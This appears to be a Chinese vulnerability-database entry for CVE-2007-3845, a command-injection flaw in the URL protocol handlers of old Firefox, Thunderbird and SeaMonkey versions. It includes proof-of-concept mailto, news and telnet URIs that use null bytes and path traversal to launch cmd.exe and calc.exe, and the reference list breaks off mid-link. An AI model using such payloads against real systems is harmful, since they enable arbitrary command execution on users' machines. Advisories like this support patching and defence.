Mozilla Firefox/ Thunderbird/SeaMonkey URL处理器远程命令注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113366 漏洞类型 输入验证
发布时间 2007-07-25 更新时间 2007-09-13
CVE编号 CVE-2007-3845 CNNVD-ID CNNVD-200708-064
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/30381
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-064
|漏洞详情
Firefox是一款非常流行的开源WEB浏览器。MozillaFirefox2.0.0.6之前、Thunderbird1.5.0.13之前及2.x到2.0.0.6和SeaMonkey1.1.4之前版本在处理包含特定字符的URL串时存在命令注入漏洞,远程攻击者可能利用此漏洞在用户系统上执行任意命令。Firefox没有过滤传送给某些URI的数据,如果向http、https、ftp、gopher、telnet、mailto、news、snews、nttp等协议传送了包含有"%00"字符的URL,就会根据完整URL的扩展名调用FileType处理器而不是ULR协议处理器,然后将URL传送给该文件处理器。远程攻击者可以通过创建恶意的URI链接来利用这个漏洞,如果用户受骗跟随了该链接的话,Firefox就会将URI传送给注册的URI处理器,导致注入并执行任意命令。这个漏洞还影响IE等其他浏览器,及Skype、AcrobatReader等应用程序。
|漏洞EXP
source: http://www.securityfocus.com/bid/25053/info

Multiple browsers are prone to vulnerabilities that let attackers inject commands through various protocol handlers.

Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through processes such as 'cmd.exe' by employing various URI handlers.

An attacker can exploit these issues to carry out various attacks by executing arbitrary commands on a vulnerable computer.

Exploiting these issues would permit remote attackers to influence command options that can be called through protocol handlers and to execute commands with the privileges of a user running the application. Successful attacks may result in a variety of consequences, including remote unauthorized access.

Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9 are reported vulnerable to these issues. Other versions of these browsers and other vendors' browsers may also be affected. 

mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat

news:windows/system32/calc.exe%20"%20-%20"%20blah.bat

snews:windows/system32/calc.exe%20"%20-%20"%20blah.bat

telnet:windows/system32/calc.exe%20"%20-%20"%20blah.bat

telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l

news:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1

nntp:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1

snews:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1

mailto:// C:\lotus\notes\notes.exe /defini %1
|参考资料

来源:BUGTRAQ
名称:20070803FLEA-2007-0040-1thunderbird
链接:http://www.securityfocus.com/archive/1/archive/1/475450/30/5550/threaded
来源:www.mozilla.org
链接:http://www.mozilla.org/security/announce/2007/mfsa2007-27.html
来源:bugzilla.mozilla.org
链接:http://bugzilla.mozilla.org/show_bug.cgi?id=389580
来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-1600
来源:bugzilla.mozilla.org
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=389106
来源:UBUNTU
名称:USN-503-1
链接:http://www.ubuntu.com/usn/usn-503-1
来源:UBUNTU
名称:USN-493-1
链接:http://www.ubuntu.com/usn/usn-493-1
来源:BID
名称:25053
链接:http://www.securityfocus.com/bid/25053
来源:BUGTRAQ
名称:20070801FLEA-2007-0039-1firefox
链接:http://www.securityfocus.com/archive/1/archive/1/475265/100/200/threaded
来源:MANDRIVA
名称:MDVSA-2008:047
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2008:047
来源:MANDRIVA
名称:MDVSA-2007:047
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2007:047
来源:MANDRIVA
名称:MDKSA-2007:152
链接:http://www.mandriva.com/security/adv